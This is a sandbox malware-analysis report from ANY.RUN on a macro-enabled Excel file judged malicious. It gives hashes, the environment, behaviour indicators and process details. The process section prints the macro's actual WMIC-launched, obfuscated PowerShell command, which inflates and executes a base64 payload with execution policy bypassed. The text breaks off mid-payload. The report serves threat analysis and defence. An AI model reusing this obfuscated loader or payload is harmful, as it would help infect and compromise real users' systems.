General Info

File name

MIL0001537426.xls

Full analysis
https://app.any.run/tasks/dcd07c36-7b14-4296-a080-058f39a7b5ec
Verdict
Malicious activity
Analysis date
9/11/2019, 09:30:47
OS:
Windows 10 Professional (build: 16299, 64 bit)
Tags:

macros

macros-on-open

maldoc-5

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Sep 9 09:33:00 2019, Last Saved Time/Date: Mon Sep 9 09:37:00 2019, Security: 0
MD5

f564e32039fd930a7688a7325b3ec5fb

SHA1

2526a64145f814f8c1760a531f22de3cf8f4a4cf

SHA256

4bb516d3e5546a1ee287abe9a2b6fa3fbef3b6092a49edf13d2bb19cc1c00850

SSDEEP

1536:zP5HNfeQuP8mo1X9rlnSYYcMA+eIFAlYkRIbTkKBEqEXugsCZmbpoahZhC0cixI9:zP5HNfeQu8mo1X9rlnSYYcMA+eIFAlYu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.431.16299.0 KB4103768
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • CCleaner (5.35)
  • FileZilla Client 3.31.0 (3.31.0)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft Office Professional 2019 - en-us (16.0.11328.20158)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Office 16 Click-to-Run Extensibility Component (16.0.11328.20158)
  • Office 16 Click-to-Run Licensing Component (16.0.11328.20158)
  • Office 16 Click-to-Run Localization Component (16.0.11328.20158)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Windows 10 for x64-based Systems (KB4023057) (2.19.0.0)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)
  • Windows 10 Upgrade Assistant (1.4.9200.22175)

Hotfixes

  • Client LanguagePack Package
  • Foundation Package
  • InternetExplorer Optional Package
  • KB4054022
  • KB4055237
  • KB4055994
  • KB4058043
  • KB4078408
  • KB4093110
  • KB4094276
  • KB4103729
  • KB4131372
  • KB4134661
  • LanguageFeatures Basic en us Package
  • LanguageFeatures Handwriting en us Package
  • LanguageFeatures OCR en us Package
  • LanguageFeatures Speech en us Package
  • LanguageFeatures TextToSpeech en us Package
  • MediaPlayer Package
  • Microsoft OneCore ApplicationModel Sync Desktop FOD Package
  • NetFx3 OnDemand Package
  • ProfessionalEdition
  • QuickAssist Package
  • RollupFix

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads the Task Scheduler COM API
  • mmc.exe (PID: 4756)
Loads the Task Scheduler DLL interface
  • mmc.exe (PID: 4756)
Scans artifacts that could help determine the target
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads the machine GUID from the registry
  • mmc.exe (PID: 4756)
  • cvtres.exe (PID: 3740)
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 5348)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • cvtres.exe (PID: 4200)
  • powershell.exe (PID: 1084)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 3404)
  • powershell.exe (PID: 5396)
  • csc.exe (PID: 1580)
  • powershell.exe (PID: 580)
  • csc.exe (PID: 5724)
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Reads Environment values
  • powershell.exe (PID: 3420)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 580)
  • powershell.exe (PID: 5348)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 556)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 3404)
  • EXCEL.EXE (PID: 5580)
Executes PowerShell scripts
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
PowerShell script executed
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Executed via WMI
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Application launched itself
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Reads mouse settings
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Uses WMIC.EXE to create a new process
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Manual execution by user
  • mmc.exe (PID: 4756)
  • mmc.exe (PID: 248)
  • EXCEL.EXE (PID: 2736)
Reads the software policy settings
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 5348)
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 580)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 1084)
  • POWeRsHEll.exe (PID: 556)
  • powershell.exe (PID: 3404)
  • EXCEL.EXE (PID: 5580)
Reads settings of System Certificates
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 580)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 5348)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 3404)
  • powershell.exe (PID: 1084)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 1948)
  • POWeRsHEll.exe (PID: 556)
  • EXCEL.EXE (PID: 5580)
Creates files in the user directory
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads the machine GUID from the registry
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (78.9%)
EXIF
FlashPix
Author:
null
LastModifiedBy:
null
Software:
Microsoft Excel
CreateDate:
2019:09:09 08:33:00
ModifyDate:
2019:09:09 08:37:00
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
allegati
HeadingPairs
null
null
CompObjUserTypeLen:
41
CompObjUserType:
Foglio di lavoro di Microsoft Excel 2003

Video and screenshots

Processes

Total processes
135
Monitored processes
36
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe powershell.exe powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs conhost.exe no specs csc.exe no specs cvtres.exe no specs excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe powershell.exe powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs csc.exe no specs cvtres.exe no specs mmc.exe no specs mmc.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
5580
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.11328.20158
Modules
Image
c:\program files\microsoft office\root\office16\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\combase.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\wtsapi32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\d2d1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winsta.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\d3d10warp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\cryptbase.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msiso.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\webio.dll
c:\windows\system32\windows.system.profile.retailinfo.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\sppc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\system32\msxml6.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\dpapi.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\propsys.dll
c:\windows\system32\mpr.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\coml2.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\root\office16\msoarianext.dll
c:\windows\system32\slc.dll
c:\windows\system32\srpapi.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\uiautomationcore.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\sxs.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\dcomp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\wintrust.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\usp10.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\globinputhost.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeuires.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbeuiintl.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft office\root\vfs\system\fm20.dll
c:\program files\microsoft office\root\vfs\system\fm20enu.dll
c:\program files\microsoft office\root\vfs\system\mscomctl.ocx
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.431_none_887985224abb0026\comctl32.dll
c:\windows\system32\webservices.dll
c:\windows\system32\netutils.dll

PID
5432
CMD
wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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